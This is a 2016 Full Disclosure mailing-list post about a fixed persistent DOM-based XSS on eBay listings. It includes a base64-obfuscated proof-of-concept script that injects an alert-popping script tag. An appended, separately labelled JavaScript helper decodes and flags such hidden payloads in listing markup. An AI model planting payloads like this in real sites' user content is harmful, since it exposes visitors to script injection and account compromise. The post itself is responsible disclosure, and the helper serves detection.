Open Source and information security mailing list archives
Message-ID: <CAENVrzRPkV1t19GEOZAQjMbRH9EaYE53YurVNUq8iE2e=XU11g@mail.gmail.com>
Date: Thu, 18 Feb 2016 08:50:41 +0200
From: Alexander Korznikov <nopernik@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] EBAY Bugbounty: Persistent DOM Based XSS on ebay.com

Hello all,

Description: Persistent DOM based Cross Site Scripting on ebay.com domain.
Disclosed to Ebay: January 2015
Fixed: February 2016
Vulnerability location: Every listing
Who are able to create: Sellers
Same origin policy bypass via postMessage

Write-up: http://www.korznikov.com/2016/02/persistent-stored-dom-xss-on-ebaycom.html

Proof of Concept: this code is inserted to the listing to pop-up alert on ebay.com domain.

<script>
window.onload = function() {
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.text = atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7");
    document.body.appendChild(s);
}
</script>

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
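Added example, not part of the original post and not eBay's or the author's code: a heuristic triage helper for reviewing seller-supplied listing markup, which decodes `atob()` string literals inside inline scripts and reports what the hidden payload does. The names `triageListing` and `SAMPLE_LISTING` are hypothetical, the sample input is the PoC markup quoted in the message, and it assumes Node.js for `Buffer`.

```javascript
// Constructed sample: the listing markup from the PoC in the message above.
const SAMPLE_LISTING = `<script>
window.onload = function() {
    var s = document.createElement('script');
    s.type = 'text/javascript';
    s.text = atob("X29kdFRpdGxlPSdcPHNjcmlwdFw+YWxlcnQoXCd4c3MgYnkgYWxleGFuZGVyIGtvcnpuaWtvdlxcblxcblwnXCtkb2N1bWVudC5kb21haW4pO1w8XC9zY3JpcHRcPic7");
    document.body.appendChild(s);
}
</script>`;

// Hypothetical helper: one finding per base64 literal passed to atob()
// inside an inline <script> block of the listing HTML.
function triageListing(html) {
  const findings = [];
  const scriptRe = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  const atobRe = /atob\(\s*['"]([A-Za-z0-9+\/=]+)['"]\s*\)/g;
  for (const [, body] of html.matchAll(scriptRe)) {
    // The surrounding script builds a new <script> element at runtime.
    const buildsScript = /createElement\(\s*['"]script['"]\s*\)/i.test(body);
    for (const [, b64] of body.matchAll(atobRe)) {
      const decoded = Buffer.from(b64, 'base64').toString('utf8');
      // A leading "name =" means the payload overwrites a page variable.
      const assign = decoded.match(/^\s*([A-Za-z_$][\w$]*)\s*=/);
      findings.push({
        buildsScript,
        decoded,
        assignedGlobal: assign ? assign[1] : null,
        // Script tag (possibly backslash-escaped) hidden in the decoded text.
        hiddenScriptTag: /<\\?\/?script/i.test(decoded),
      });
    }
  }
  return findings;
}

for (const f of triageListing(SAMPLE_LISTING)) {
  console.log(JSON.stringify(f, null, 2));
}
```

On the sample, the decoded payload turns out to be an assignment to a page-level variable whose new value carries a script tag, which is the detail a reviewer needs to locate the sink on the hosting page.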